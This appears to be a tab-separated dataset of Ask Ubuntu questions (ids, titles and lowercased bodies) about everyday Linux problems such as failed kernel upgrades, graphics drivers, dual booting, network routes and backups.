328868	force terminal text editors to open specific file types first , if there are multiple with the same name	if i have multiple files all with the same name ( except , of course , the extension ) , is there a way of making bash auto-complete to a specific extension when i open them from the terminal with a text editor ? in particular , i am using latex with vim , and upon compiling one gets log files , aux files etc , and so i need to first type vim w , auto-complete to vim work. , then put in another t and auto-complete to vim work.tex . it seems like there should be a way of telling bash to got straight to the tex file . i imagine this is not going to be vim specific , but i am not 100 % , so i have left the tag in .
328870	how is ubuntu software update implemented internally ?	i need this information so that i can implement same mechanism in distribution of my own software . thanks in advance .
328874	how to print using wireless to a canon mg6150 ?	i have successfully connected my canon mg6150 to my laptop , using the `` add printer '' function . however , the print command only works over a usb connection . the laptop connects wirelessly to my bt homehub 3 and the internet but when i check the network , none of the other devices on the network are shown . likewise , when i check the network on my windows-based desktop , it shows everything but this laptop . i 'm using ubuntu 12.04 . any help will be much appreciated
328877	i have 4 gb ram.. what should be the perfect swap partition size ?	i heard that swap memory partition should be double the size of ram.. is it true ? so i have to keep 8 gb swap space ? i 'm gon na install ubuntu gnome 13.04 .
328881	kernel did not upgrade between 12.04- > 12.10- > 13.04	last week i did a dist-upgrade from ubuntu 12.04 to 12.10 and after that from 12.10 to 13.04 . almost everything worked quite ok , but i noticed that the kernel was still 3.2.0.52 and not a 3.8 kernel . i installed on an acer-aspire , 6gb memory , 250 gb partition on the hd and use amd64 the problem is in installing memtest86+ in grub . when performing an apt-get upgrade i get following : $ sudo apt-get upgrade [ sudo ] password for robert : reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : gnuplot-nox gnuplot-x11 the following packages will be upgraded : libdvdnav4 1 upgraded , 0 newly installed , 0 to remove and 2 not upgraded . 6 not fully installed or removed . need to get 0 b/40.2 kb of archives . after this operation , 9,216 b of additional disk space will be used . do you want to continue [ y/n ] ? ( reading database ... 464427 files and directories currently installed . ) preparing to replace libdvdnav4 : amd64 4.2.0+20130225-1 ( using ... /libdvdnav4_4.2.0+20130225-1ubuntu0.1_amd64.deb ) ... unpacking replacement libdvdnav4 : amd64 ... setting up linux-image-3.8.0-28-generic ( 3.8.0-28.41 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.8.0-28-generic /boot/vmlinuz-3.8.0-28-generic run-parts : executing /etc/kernel/postinst.d/dkms 3.8.0-28-generic /boot/vmlinuz-3.8.0-28-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.8.0-28-generic /boot/vmlinuz-3.8.0-28-generic update-initramfs : generating /boot/initrd.img-3.8.0-28-generic run-parts : executing /etc/kernel/postinst.d/pm-utils 3.8.0-28-generic /boot/vmlinuz-3.8.0-28-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 3.8.0-28-generic /boot/vmlinuz-3.8.0-28-generic run-parts : executing /etc/kernel/postinst.d/zz-update-grub 3.8.0-28-generic /boot/vmlinuz-3.8.0-28-generic generating grub.cfg ... run-parts : /etc/kernel/postinst.d/zz-update-grub exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.8.0-28-generic.postinst line 1010. dpkg : error processing linux-image-3.8.0-28-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 no apport report written because maxreports is reached already setting up memtest86+ ( 4.20-1.1ubuntu3 ) ... generating grub.cfg ... dpkg : error processing memtest86+ ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already setting up grub-pc ( 2.00-13ubuntu3 ) ... installation finished . no error reported . generating grub.cfg ... dpkg : error processing grub-pc ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of linux-image-extra-3.8.0-28-generic : linux-image-extra-3.8.0-28-generic depends on linux-image-3.8.0-28-generic ; however : package linux-image-3.8.0-28-generic is not configured yet . dpkg : error processing linux-image-extra-3.8.0-28-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-3.8.0-28-generic ; however : package linux-image-3.8.0-28-generic is not configured yet . linux-image-generic depends on linux-image-extra-3.8.0-28-generic ; however : package linux-image-extra-3.8.0-28-generic is not configured yet . no apport report written because maxreports is reached already dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 3.8.0.28.46 ) ; however : package linux-image-generic is not configured yet . dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already no apport report written because maxreports is reached already setting up libdvdnav4 : amd64 ( 4.2.0+20130225-1ubuntu0.1 ) ... processing triggers for libc-bin ... ldconfig deferred processing now taking place errors were encountered while processing : linux-image-3.8.0-28-generic memtest86+ grub-pc linux-image-extra-3.8.0-28-generic linux-image-generic linux-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 ) please advice . i already tried to reinstall memtest86+ , grub , etc . but that did not help . preferebly i do not want to reinstall the distribution many thanks robert
328890	how to set a single shortcut to switch an internet connection on and off	which exact one-line conditional construct activates an existing internet connection if it 's off and deactivate it if it 's on ? i looked some on-line pages to understand the use of the `` nmcli '' command the `` if then else fi '' construct command substition , i.e . the use of `` $ ( command_name ) '' function to get the output of a command the `` grep '' command to manage the nmcli command output the final construct should be of this kind : if ( nmcli myconnection status = down ) ; then nmcli c up id `` myconnection '' ; else nmcli c down id `` myconnection '' ; fi note : the if condition is not real code and should be elaborated . but i did n't find an option for the nmcli command to test if a connection is up or down . i thought of using the `` status '' option , i.e . : `` nmcli c status id `` myconnection '' '' , but while nmcli gives a grep-parsable output message when `` myconnection '' is up , it returns an error and does n't exit to the command line when `` myconnection '' is down ( the cursor in the terminal window stays there and a ctrl+c is needed to get the shell prompt back ) . i need some help to arrange these things into a complete one-line script usable in the system settings > keyboard > shortcuts > custom shortcuts list . thank you very much . p.s . : this question follows what learned here some time ago : how to set a keyboard shortcut to activate an existing internet connection ? so is ubuntu 13.04 , internet connection type is mobile broadband
328891	merging accounts	i noticed that there are a few seperate ubuntu accounts like one and software center . i 'm not sure if there is another one for singing into this , but will they ever merge all of the accounts ?
328896	what about the other partition after installing ?	i am going to install ubuntu 13.04-x64 on my pc . currently , i have two hard disk partitions as `` c '' on which i have my windows 8 installed and `` d '' which contain all my personal files . i having no problem formating or erasing `` c '' since i am not going to switch back to windows . the weired thing happened after i installed ubuntu on `` c '' that i can not see the other partition `` d '' in ubuntu system . thanks god that i forced to switch back to windows to check the other partition and still not touched as i was aware that it might be removed during installation of ubuntu . i need a tip to install ubuntu and exploring both partitions inside like as it in windows . any help guys ? for note that i am going to install ubuntu from a dvd ; )
328898	video splitter requirement	after having searched here & there i could n't find an alternative to a win application namely solveigmm video splitter . my requirement isnt a clone of this application rather the way i use it ! now i use it something like this i open up an hour long video & being an english teacher i mark it at various durations ( on average 10+ ) & then those parts are merged to result another short clip ... something close to this is openshot in linux however after every duration i had to drag it to another track & then join it , pretty intensive & repetitive . now am open to cli options as well e.g is there a way to mark at various durations & the start time & the end time being saved to a text file then via terminal & some bas i input this to ffmpeg where it make various & then joins them ?
328901	installing internet security suite ?	do i need to have an internet security suite installed on my ubuntu or it is safe without . what recommended names if i had to get one installed ?
328903	why does n't my system use hardware rendering ?	almost everything which is remotely using my gpu lags horribly , so i decided to dive into the system to check . chloridecull @ sonicrainboom : ~ $ glxinfo | grep renderer opengl renderer string : gallium 0.4 on llvmpipe ( llvm 3.2 , 128 bits ) a quick excerpt from the radeondriver page on the wiki tells me : to see your opengl information , you can run the commands below . make sure your opengl renderer string does not say `` software rasterizer '' or `` llvmpipe '' because that would mean you have no 3d hardware acceleration : the output from lshw is below , showing that i have a 7970 using the radeon driver which should happily accept whatever is thrown at it . chloridecull @ sonicrainboom : ~ $ sudo lshw -c video *-display description : vga compatible controller product : tahiti xt [ radeon hd 7970 ] vendor : advanced micro devices , inc. [ amd/ati ] physical id : 0 bus info : pci @ 0000:02:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list rom configuration : driver=radeon latency=0 resources : irq:46 memory : d0000000-dfffffff memory : fbc80000-fbcbffff ioport : ee00 ( size=256 ) memory : fbc00000-fbc1ffff dpkg reports that the xserver-xorg-video-radeon is at version 1:7.1.0-0ubuntu2 . i had fglrx installed before this , but i purged it by following the guide on the videodriverdetection page . how do i enable 3d hardware processing ?
328906	ubuntu bootable usb not at all detected	i started on a journey to dual boot my win8 system with ubuntu 12.04 , but i have been hitting with one or the other problem . i installed ubuntu 12.04 with win8 successfully apart from the issue of ralink 3290 not wireless not working . when i got that working , i got `` kernel panic '' problem , so i decided to do everything clean once again since i did a lot of trial and error to arrive at the current situation . so i brought my pc to factory condition ( only win8 ) with a single partition and a recovery partition . now the problem is that my bootable usb with ubuntu is not detected at all in the boot up seq . i deliberately pressed `` esc + f9 '' , but surprisingly my usb does not even appear in the boot menu . i have another age old laptop with winxp , which detects the bootable usb , so that means there is some problem with my current win8 pc . any help will be appreciated and set me on another journey to have ubuntu live ! ! p.s : i have a uefi based system . update : 1 ) i can see the usb drive in windows normally 2 ) i can see it in bios and usb is in higher priority in the boot order . so no problems there too . the problem is that i do n't see the usb in the boot menu , but i see the same usb in the boot menu of my winxp . so there is some problem in my bios which is not able to detect my usb as a bootable device . here i am at loss as what could be the problem ?
328907	surface pro touch screen problems when displaying to a second ( non-touch ) monitor , in 12.04	when i connect my surface pro running 12.04 to a second ( non-touch ) monitor ( westinghouse digital electrons 19 '' , 1280x1024 for example , but happens with another dell monitor ) , the touch screen on my surface responds but places the cursor in the wrong location . if i have the 2nd monitor set to display above my surface , the cursor appears about 1-2 inches directly above where my finder or stylus is touching the screen . actually if i touch the screen at the bottom of the surface screen , the cursor is directly under my finger as expected . the further i move the finger up , the further the cursor moves away from the finger . with my finger at about the midpoint of the surface screen , the cursor is in the black bar , nearly on the second screen . if the second monitor is displayed to the left of the surface , the cursor is too far to the left , etc .
328909	new user has low display resolution	i have created a new user with adduser . now when i log in as this new user i only have options to select display resolution up to 1024x768 , as i had as my main user when i installed the system ( i remedied that by installing intel graphics drivers ) are the drivers i installed per-user and i need to install them for each user i create ?
328911	calender is n't mark for offline usage problem	i am using evolution . there is an error message in there saying error loading calender . calender is n't marked for offline usage . how do i mark it for offline use ? i do n't see any box..
328912	screen shuts down when trying to install or try ubuntu ?	i bought lenovo y510p and i want to use ubuntu . when i try install or try ubuntu the screen shuts down and nothing appears . when i selected to try ubuntu . i hear the sound of ubuntu start yet , the screen still turned off . i now installed ubuntu on the hard driver , the screen still turns off when i start ubuntu . however , i tired to make the laptop sleep by clicking fn+f1 then when i press any key to wake it up the screen turns on ! does anyone have an explanation , if so how to fix it ? note : i have two video cards nvidia gforce 750m 2gb and intell video card .
328914	pcmanfm bookmarks not being respected by other applications	i 've just migrated from lubuntu 12.10 to lubuntu 13.04 and pcmanfm bookmarks are not working properly . bookmarks work fine when on pcmanfm but if you goto to firefox , chromium , leafpad , libreoffice or any other application and try to access your bookmarks from those applications , i can see only an old set of bookmarks . it was not a really fresh install : i keep my /home in a separate partition , so /root and /swap are the fresh ones . the only fresh install was lubuntu 11.10 sometime ago . the file .gtk-bookmarks at my /home folder seems to be updated correctly from what i checked . so every bookmark changed on pcmanfm is changed on that file . more info : if i open leafpad ( it could be any other application except pcmanfm ) , menu file > open > and from that window i bookmark another folder , that folder wo n't be available on bookmarks at pcmanfm but it will be available as a bookmarked folder on the other applications ( leafpad , chromium and so on ) . finally , when modifying pcmanfm bookmarks from this window , the file .gtk-bookmarks at my /home folder will not be updated as expected , confirming the modification is not acknowledged by pcmanfm but acknowledged by the other applications . more info 2 : besides the file .gtk-bookmarks at my /home folder , i noticed there 's a file called bookmarks at /home/username/.config/gtk-3.0 . so now i realise that my applications ( leafpad , libreoffice , chromium ) are seeing that file inside that path and not seeing the file .gtk-bookmarks at my /home folder . more info 3 : i 've just set up lubuntu 13.04 fresh in a vm and i can see the same odd behaviour described above , so i 'd say it looks like a bug on pcmanfm dealing with gtk3 . however i 'm not a dev so i need confirmation . is that a bug or is it expected ? any suggestions ? thank you in advance for your help !
328915	moving directories	if i use the cp command to copy a directory a to the inside of directory b , will it double the amount of space that it takes up ( directory a + copied version of directory a ) ? i ca n't imagine that would be the case , but would it disturb the look up time on disk for the files in that directory ? i am a beginner so i 'm sorry if this question does n't really make sense .
328920	not able to install freerdp on ubuntu ( guacamole server pre-requisite )	i am trying to work on a guacamole application on linux and that requires a freerdp version installed on the system . i am tired of finding packages over internet for freerdp but none of them worked . i 've also looked up in ubuntu software center and installed every possible package followed by sudo apt-get update and sudo apt-get upgrade i looked up in the documentation of guacamole and found this : apt-get install libguac-client-ssh0 libguac-client-rdp0 but on running this , i get the following error message : e : unable to locate package libguac-client-ssh0 e : unable to locate package libguac-client-rdp0 what can be the possible solution. ? ? what am i doing wrong ? please help ... !
328923	install ubuntu 12.04 on macbook air 6.2 : refit resync partitions	i 'm trying to set up a macbook air 6,2 to dual boot osx and ubuntu 12.04 . i 've been following these instructions : https : //help.ubuntu.com/community/mactelsupportteam/appleintelinstallation i 'm using refit instead of refind because i saw some reports that refind was n't working properly with macbook airs ( and that refit worked fine ) . i 've gotten to the point of needing to resync the partition tables in refit . when i run the partition tool i see this : http : //i44.tinypic.com/2crq4vo.jpg is this what it 's supposed to look like ? i 'm concerned that in my current gpt table the partition i formatted as ext4 and set to mount at / is showing up as `` basic data '' and that in the `` proposed new mbr partition table '' there is no linux . if this is not as it should be what might be the problem and how might i fix it ? thanks !
328927	are wireless card interchangeable ? can i mount a bcm4313 on a notebook that originally mounted a rt3290 ?	i would like to mount a wireless card ( bcm4313 ) on a notebook that used to mount a rt3290 card , is it possible ? will it work ? thank you for your answer
328930	switched from windows xp to ubuntu	i have a computer , below are the specs : ram : 1gb ddr2 processor : intel ( r ) celeron ( r ) cpu 2.53ghz network adapter : intel ( r ) pro/100 ve network connection ( ethernet ) 500gb ide hdd the computer is currently running windows xp and is extremely slow , is switching to ubuntu 12.04lts a good idea ( performance wise ) ? thank you : )
328931	unable to dual boot ubuntu 12.04 lts from windows boot manager	hi i have got stuck with a problem ... i have installed ubuntu 12.04 lts using windows installer wubi.. after the installation completed it asked for the reboot . i rebooted and for the 1st time ubuntu worked very fine . after shutting it down i cant boot it from windows boot manager . when i booted it a purple screen comes which turns into flickering screen.. so how to fix this ... i have windows 7 64 bit os , radeon graphics ...
328935	monitors not found after nvidia driver update ( situation details included )	background i plugged an nvidia gtx 650 ti into a desktop computer running kubuntu 13.04 . i started out following this guide on dedoimedo.com , moving on to the general nvidia driver omnianswer here on ask ubuntu . the advice there ( and that accessible through the relevant links ) has been tried . current situation the gpu is found . lspci | grep -i vga returns 01:00.0 vga compatible controller : nvidia corporation gk106 [ geforce gtx 650 ti ] ( rev a1 ) . the edgers ppa is active , using the nvidia-325 driver package . jockey says it has been enabled , but not in use . 319 , 313 , 310 and 304 ( the last one being set up by nvidia-current , apparently ) do not improve the situation . jockey-text -l output the xorg.conf file is generated by nvidia-xconfig , run after enabling the driver via jockey . my xorg.conf ( oddity : nvidia-xconfig does not run from anywhere . i have to go into the nvidia-325 directory and run it from there . ) normal startup results in the kubuntu logo flashing for a second or two . but instead of the login screen appearing , the monitor goes blank . going into recovery mode and running startx gives a no screens found error . the error log in xorg.0.log by deleting xorg.conf , i can boot normally into a barely-functioning kde . default resolution very low , window title bars not visible , desktop effects off , and so on . the question where do i go from here to get a functional , accelerated desktop environment ?
328937	mobile broadband not showing in network manager	i have very big problem with mobile broadband connections ... i tried on my laptop to connect and searched the web for possible solution , but did n't found it . the problem is that i do n't have the menu mobile broadband . i have only wireless and wired connection . i even do n't see the enable mobile broadband ! i had success with one usb modem with sakis3g , but on my new alcate did n't worked . i 've tried also on new freshly installed ubuntu 12.04 on pc , and again - no menu at all for mobile broadband ! when i open `` network connections '' i have menu mobile broadbands and when i add a connection - nothing happens , it shows me `` last used - never '' in addition to add - in `` networks '' i ca n't add mobile broadband , i only have wired , wireless , network proxy and when i try to add ne type it only shows vpn option . when i saw i did n't have `` mobile broadband '' in network manager i tried to reinstall it and did big mess , now my menu is very strange ( i thing i did n't installed the amd64 at first and that 's why it 's so weird )
328947	backup failed , need help not failing	backup ( deja dup ) failed to do an initial backup to my amazon s3 , and despite my best googling efforts , i could not find a solution : ( here 's the error message : backendexception : error uploading s3+http : //deja-dup-auto-akiaiksyiqi3buaaz26a/my-archive/duplicity-full.20130805t143807z.vol1.difftar.gpg i 'm running ubuntu 12.04 lts on a system76 . the folder i 'm trying to backup to in s3 is set to store as amazon glacier storage . any help would rock ! update : better debugging info : duplicity : . failed to create bucket ( attempt # 1 ) 'deja-dup-auto-axxxxxxxxxxxa ' failed ( reason : s3responseerror : s3responseerror : 403 forbidden duplicity : . < ? xml version= '' 1.0 '' encoding= '' utf-8 '' ? > duplicity : . < error > < code > signaturedoesnotmatch < /code > < message > the request signature we calculated does not match the signature you provided . check your key and signing method. < /message > < stringtosignbytes > 47 00 54 0a 0a 0a 4d 6f 6e 00 20 30 35 20 00 75 67 20 32 30 31 00 00 35 00 32 34 3a 31 32 20 47 4d 00 0a 2f 64 65 6a 61 2d 64 75 70 2d 61 75 74 6f 2d 61 6b 69 00 6b 73 79 69 71 69 33 62 75 61 00 7a 32 36 61 2f < /stringtosignbytes > < requestid > 8000000000003 < /requestid > < hostid > uxxxxxxxxxxxxxxxxx/xxxxxxxxxxxxxxxxrf < /hostid > < signatureprovided > yxxxxxxxxxxxxxxxxxxxxx < /signatureprovided > < stringtosign > get
328949	i was looking for the command line and have no clue where it is	i have n't used linux in a long while . this version of ubuntu is very different from the one i 've used in the past . i was looking for the command line and have no clue where it is . also , where are all the apps located at ? i downloaded and installed chromium , but i do n't know how to open it .
328951	how to delete files/folder from ubuntu one cloud	i can not delete files from my cloud account . please tell me how to delete files/folder from my ubuntu one cloud account .
328952	how do i change the login manager 's keyboard layout ?	i have a netbook with an azerty layout . i 've changed it to `` bépo '' to try it , but now i 've reset it to a french layout . while all the apps have taken the change into account , ubuntu 's login manager still uses bépo , making entering passwords a challenge . i 've enabled the virtual keyboard for the time being so that i could login again . i do n't remember what i had done in the first place to switch the login screen to bépo , but now i ca n't switch it back . edit : in the keyboard settings page , if i click `` use system defaults '' , then everything is in bépo ! where is this different keyboard layout set ? another edit : here 's what did not work : changing the layout in settings using the `` use system defaults '' checkbox in settings sudo dpkg-reconfigure keyboard-configuration changing it in xconf adding a line in /etc/lightdm/lightdm.conf sudo dpkg-reconfigure locales slaming head against desk dpkg-reconfigure lightdm sudo gsettings set org.gnome.libgnomekbd.keyboard layouts `` [ 'fr ' ] '' combinations of the above is it possible to relaunch the keyboard configuration tool that 's in ubuntu 's setup ? the thing has automatic layout detection and it changes the setting everywhere .
328953	dual boot windows next to ubuntu	i have some windows games/programs that wo n't run using wine . so i want to install windows next to ubuntu , without ( of course ) deleting ubuntu . i know that mac has such a thing as bootcamp , but how does this work for ubuntu ? what i expect to be possible is something like this : while in the boot screen , i want to be able to choose between ubuntu and windows xp . i tried googling this , but honestly , i do n't even know what to look for .
328955	computer not reconizing ubuntu boot file . ubuntu 13.04	after trying many times to install ubuntu 12.04 onto my computer and it not working i gave 1 last shot to the latest software ( being 13.04 ) , and it installed but it wont boot unless i have the install disk in my disk tray . i also believe that it is not saving what i do and just giving me a fresh version of ubuntu every time . i saw some things about changing the /etc/default/grub.d file or something like that , but i am still not sure . if someone can help me that would be great .
328962	can i try out xmir/mir on a 13.10 startup disk ?	i 'd like to try out xmir on 13.10 , but currently do n't have a spare machine to install it on ( and i understand it does n't play nice with virtualbox ) . i have a startup disk created from the 13.10 daily images , but so far as i can tell this is running a regular x session and not xmir . so , how would i go about trying out xmir here ? the typical add-the-ppa method ? or can i expect that the startup disk images will include xmir by default in the near future ?
328963	how do i hear my microphone ?	i just got some headphones with a microphone . i want test the microphone . but , the problem is how can i hear what i say in microphone in my headphones . thank you guys . i hope you will help me , to solve this problem . have a nice day .
328966	what are some ubuntu projects to contribute ?	i decided to take part upon developing ubuntu applications although i am having trouble finding projects to contribute in c , c++ , c # and java at launchpad ( not necessarily launchpad alone ) . can you offer several projects that are ubuntu related ?
328969	installation on sony vaio z1ra laptop	trying to install ubuntu desktop 12.04 on a sony vaio laptop - model pcg-z1ra . does not allow install from disk . says that there are features missing in the cpu for this kernel . the cpu is a pentium m processor 1.50ghz . is there an earlier version that i should try ?
328972	how to deploy django app from bazaar branch with juju ?	i 'm attempting to deploy a django app from bazaar branch with juju using the python-django charm . i 've followed the quick start directions from the readme.md file : juju bootstrap juju deploy -- config mydjangosite.yaml python-django juju deploy postgresql juju add-relation python-django postgresql : db juju deploy gunicorn juju add-relation python-django gunicorn juju expose python-django my mydjangosite.yaml file looks like : mydjangosite : vcs : bzr repos_url : lp : mydjangosite it seems like the quick start directions must be missing something . this successfully deploys a running django instance , but it 's just the hello world app that displays : it worked ! congratulations on your first django-powered page . if i ssh into the django instance , i do n't see my bzr branch anywhere . /srv/python-django/ just contains the default juju django project files .
328978	sudo apt-get install nautilus-open-terminal does not work	i newly installed ubuntu 13.04.i want to install nautilus open terminal facility.when i execute sudo apt-get install nautilus-open-terminal it says : unable to locate package nautilus-open-terminal.what is wrong ?
328979	uninstalled python 3.3	i installed ubuntu 13.04 a few days back , dual-booting with windows . i mainly use python 2.7 , so i installed that ( i downloaded the .tar.gz file from python.org ) , but for some reason ( _tkinter could not be found ) , i could not use tkinter . i tried various ways of installed tkinter/tk , but they did n't work , so i thought i should uninstall it and reinstall it . in the terminal , this was my command : sudo apt-get remove python2.7 . however , this removed python 3.3 , which came pre-installed . thus , one by one the applications stopped working and i had to restart my computer . now , i can log in to ubuntu but nothing appears on the desktop . no dock , nothing . not much of a problem , since i still have windows 7 installed . i also booted ubuntu with advanced-options and then used the root to try to reinstall python 3.3 ( sudo apt-get install python3.3 ) but it said i have the latest version installed already . however , i just checked using a partition manager ( diskinternals linux reader ) , and python 3.3 is still there , at /usr/lib/python3.3 . could this be another problem then ? if so , how can i fix it ? i do n't want to reinstall ubuntu because when i first installed it , it reset windows ( located on my c drive , my d drive remained unaffected ) back to its defaults , and i had to reinstall all of my programs .
328983	permenant route addition	i 'm trying to add a route permanently to my vps , at the moment i have to run the command manually every time i find out the server has rebooted . i read somewhere i had to add something to /etc/network/interfaces but it did n't match my setup - i have multiple interfaces and the method did n't seem to match what i saw in the file . my command i run ( as root ) is : ip route add 10.33.252.0/24 via 10.33.252.75 my /etc/network/interfaces file looks like : # this configuration file is auto-generated . # # warning : do not edit this file , your changes will be lost . # please create/edit /etc/network/interfaces.head and # /etc/network/interfaces.tail instead , their contents will be # inserted at the beginning and at the end of this file , respectively . # # note : it is not guaranteed that the contents of /etc/network/interfaces.tail # will be at the very end of this file . # # auto generated lo interface auto lo iface lo inet loopback # auto generated venet0 interface auto venet0 iface venet0 inet manual up ifconfig venet0 up up ifconfig venet0 127.0.0.2 up route add default dev venet0 down route del default dev venet0 down ifconfig venet0 down iface venet0 inet6 manual up route -a inet6 add default dev venet0 down route -a inet6 del default dev venet0 auto venet0:0 iface venet0:0 inet static address 198.91.90.242 netmask 255.255.255.255 auto venet0:1 iface venet0:1 inet static address 69.175.32.40 netmask 255.255.255.255 auto venet0:2 iface venet0:2 inet static address 69.175.32.41 netmask 255.255.255.255 auto venet0:3 iface venet0:3 inet static address 69.175.32.42 netmask 255.255.255.255 auto venet0:4 iface venet0:4 inet static address 69.175.32.43 netmask 255.255.255.255 auto venet0:5 iface venet0:5 inet static address 69.175.32.138 netmask 255.255.255.255 auto venet0:6 iface venet0:6 inet static address 173.236.6.220 netmask 255.255.255.255 auto venet0:7 iface venet0:7 inet static address 198.91.90.243 netmask 255.255.255.255 auto venet0:8 iface venet0:8 inet static address 10.33.252.75 netmask 255.255.255.255 any help would be very much appreciated : )
328987	little to no mouse settings - 13.04	ok so i ca n't post a pic yet so this should be fun . on my mouse settings i only have 2 settings . primary button ( . ) left ( ) right double click slow -- -- -- -- -- | -- -- -- -- -- -fast that 's it . no speed or accel . or anything else . any ideas ?
328988	enable hdmi port xubuntu 12.04	i have an hp pavillion dm4 with intel core i5 . i 'm trying to get my second screen going but whenever i plug it in , nothing happens . the display settings do n't recognize the second output either . i looked at this answer but it 's for atom chipsets ... please help . $ lsmod | grep video uvcvideo 72627 0 videodev 98259 1 uvcvideo v4l2_compat_ioctl32 17128 1 videodev video 19651 1 i915 $ lspci | grep vga 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati robson ce [ amd radeon hd 6300 series ] $ lspci | grep hdmi 01:00.1 audio device : advanced micro devices [ amd ] nee ati cedar hdmi audio [ radeon hd 5400/6300 series ]
328990	change gui/menu 's language to chromium on ubuntu 12.04	i 'd like to change chromium language from english to italian on an ubuntu 12.04 based on english locale . thanks for helping
328997	simple password problem	why is a password like `` 12many '' considered `` fair '' when installing ubuntu 13.04 but too short and too simple when changing it ? i really have nothing to protect- i have locks on my doors and nothing valuable on my computer . i think i understand the risks of a weak but memorable password and am willing to take the associated risks . why does ubuntu want me to use 4kl0ijm7nntvd4502kq for a password ? then will not allow me to control and use my machine as i see fit ? this is why i want to use linux- so i can use it my way . i have to reinstall ubuntu because i wanted to change my password and use a simple easy to remember password . i am really inconvenienced .
329007	fn volume keys stick down	i installed xubuntu 13.04 on this laptop : http : //www.novatech.co.uk/laptop/range/novatecheliten1535.html the fn keys for wifi and screen brightness work fine , but the volume keys are problematic . when i press 'mute ' , 'volume up ' or 'volume down ' , the keypress is registered , but the key release is n't . this means the system keeps trying to adjust the volume indefinitely ( or toggle mute/unmute ) , and it becomes unresponsive to keyboard input . i can make it respond to input again if i log out and log in again but it would be really good if i could make this work and not have to remember never to touch these buttons ! i think this issue is similar to this thread : fn key sticks down ( except he had trouble with brightness keys instead of volume ) but i do n't think that solution will work because this is an uncommon laptop model . thanks : )
329011	avconf or winff	my simple question is : what should i do with the hint : * this program is deprecated * this program is only provided for compatibility and will be removed in a future release . please use avconv instead . which can be seen in the terminal every time when you start winff ? i like winff because it works very well , but the message is confusing , even if i see this message for years .
329014	how to create a directory in `` / ''	i 'm trying to build my own linux distro using `` linux from scratch '' project . in order to do so i need to access different features , on my development process i went through many troubles in ubuntu one among them was i can not able to create a directory in `` / '' . how to do that ?
329019	running excel on ubuntu : solver & macro crashes	first of all i would like to say that i am a total noob at linux / ubuntu . i have just migrated from windows 7 and so far i feel quite satisfied with the change . i 've tried using libreoffice but vba macros there do n't run quite well . so i downloaded playonlinux and installed office 2010 , but when i try to run a macro or use the solver add-in , excel crashes . is there a way this problem could be fixed ? or how do i make libreoffice to run my macro without errors ? thanks in advance
329023	how to download a tcl file	i 'm very new to ubuntu server and i 'm just experimenting with irc eggdrop bots . i would like to download a tcl file from http : //www.egghelp.org/tclhtml/3478-4-0-31-1.htm i know that wget is the command to download something from a website but every time i try to use wget with the specific url i ca n't get the file i want . any help would be greatly appreciated . thanks in advance .
329025	moving home partition ?	i followed the directions exactly as they are layed out here : https : //help.ubuntu.com/community/partitioning/home/moving my home is moved but i can not access anything in it . all folders have a lock on them and when i try to access any of them i am told : this location could not be displayed . you do not have the neccessary permissions to view the contents of `` name of folder '' help , please ! ! if nothing else could someone point me in the direction of how to restore my original home . i have not deleted the old_home that was created following the steps in the link above .
329029	galaxy nexus 4 ubuntu touch cdma questions	i was considering getting a galaxy nexus 4 and flashing ubuntu touch to start playing with it . couple of questions : does ubuntu touch work yet with cdma ? will sudo apt-get dist-upgrade & upgrade work from the terminal and will that enable me to update ubuntu without having to keep reflashing the phone as ubuntu touch moves forward in development ? my old galaxy nexus nexus has a 4g sim card . are there any advantages to that when i get my new galaxy nexus 4 ? will python 3 be on the ubuntu touch by default and can apps be developed with phython as they already can with any other ubuntu installation ? does nexus 4 `` mako '' work on cdma or is that a gsm thing ?
329030	unable to install ubuntu on msi gt60	so i recently bought a msi gt60 laptop with w8 preinstalled and i want to dual boot with ubuntu . i 've been trying to make a live usb for 13.04 and i have not yet been able to boot into live or install . i 've used different methods to create the bootable usb : tried with unetbootin ( from w7 ) tried with yumi ( from w7 ) tried with startup disk creator ( from ubuntu ) all three methods were able to boot on my work laptop ( dell precision m4600 ) but none worked on the msi . the msi laptop boots from usb and shows the efi boot menu it does n't matter which option i choose , the screen will go black and nothing will happen after that . if i boot with the same usb on my work laptop , after booting from usb it goes right to a ubuntu-like environment and shows me two options , to install or to try ubuntu and works as it should . has anyone been on the same situation ? any advice ? as far as i can tell i think of some bios/configuration ( efi ? ) incompatibility . sata configuration is set as ahci . i have w8 installed , a second hdd and no other partitions .
329031	where did sdk7 go ?	i installed from oracle sdk 7 but it did not say the path of the sdk.how can i find that where did the sdk go ? i must set java_home .
329034	how to remove windows after install wubi ?	i installed ubuntu using the windows installer and i was wondering how to get rid of the old windows install , deleting it and everything with it . i tried to just install it from my external hard drive but that did n't work .
329035	ubuntu core on new nexus 7 ?	does ubuntu core ( not ubuntu touch ) also work on the new nexus 7 with 1080p screen ? it does n't yet mention anything about the newer nexus 7 , just wondering if it is supported ? if it is not supported , does ubuntu have any plans to support it going forward ?
329049	why does accessing /localhost give `` file not found '' error ?	i was trying to install a lamp stack following the howtounix.info tutorial . i could install it but when i try to access localhost using /localhost on firefox it gave me an error , it appears `` file not found '' like i did n't have lamp server installed .
